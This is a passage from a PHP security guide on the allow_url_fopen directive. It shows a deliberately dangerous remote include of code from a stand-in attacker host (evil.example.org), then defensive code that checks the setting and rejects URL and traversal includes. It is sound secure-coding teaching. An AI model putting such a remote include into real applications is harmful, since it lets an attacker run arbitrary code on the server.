A.1. allow_url_fopen

As illustrated in Chapter 6, the allow_url_fopen directive allows you to reference remote resources as if they are local files:
<?php
// With allow_url_fopen enabled, file_get_contents() fetches a remote URL
// exactly as it would read a local file.
$contents = file_get_contents('http://example.org/xss.html');
?>
Chapter 5 reveals how dangerous this is when combined with the use of include or require:
<?php
// Deliberately dangerous: the remote file is fetched and executed as PHP.
include 'http://evil.example.org/evil.inc';
?>
I recommend disabling allow_url_fopen unless your application requires it.
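As an added example (not from the book), a startup check that refuses to run with allow_url_fopen enabled, and an include helper that only loads files resolving to a real path under an application-owned directory, so a URL such as the one above is rejected before include ever sees it. The function names and the includes directory are assumptions; PHP 7 or later is assumed for the type declarations.

```php
<?php
// Recommended php.ini setting for applications that do not need remote files:
//   allow_url_fopen = Off

// Fail fast if the directive is still enabled (assumption: this app never needs it).
function assert_remote_fopen_disabled(): void
{
    if (filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN)) {
        throw new RuntimeException('allow_url_fopen is enabled; disable it in php.ini');
    }
}

// Include $name only if it resolves to a real file inside $base.
// realpath() returns false for stream wrappers (http://, ftp://, php://, ...)
// and collapses ../ segments, so both remote includes and traversal are rejected.
function safe_include(string $name, string $base): void
{
    if (strpos($name, "\0") !== false || preg_match('#^[a-z][a-z0-9+.\-]*://#i', $name)) {
        throw new InvalidArgumentException('stream wrappers are not allowed in include names');
    }
    $baseReal = realpath($base);
    $target   = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($baseReal === false || $target === false
        || strncmp($target, $baseReal . DIRECTORY_SEPARATOR, strlen($baseReal) + 1) !== 0) {
        throw new InvalidArgumentException('include target is outside the allowed directory');
    }
    include $target;
}

// Demonstration: the local file is loaded (if it exists under includes/),
// the remote URL from the text above is refused.
try {
    assert_remote_fopen_disabled();
    safe_include('config.inc', __DIR__ . '/includes');
    safe_include('http://evil.example.org/evil.inc', __DIR__ . '/includes');
} catch (Throwable $e) {
    error_log(get_class($e) . ': ' . $e->getMessage());
}
?>
```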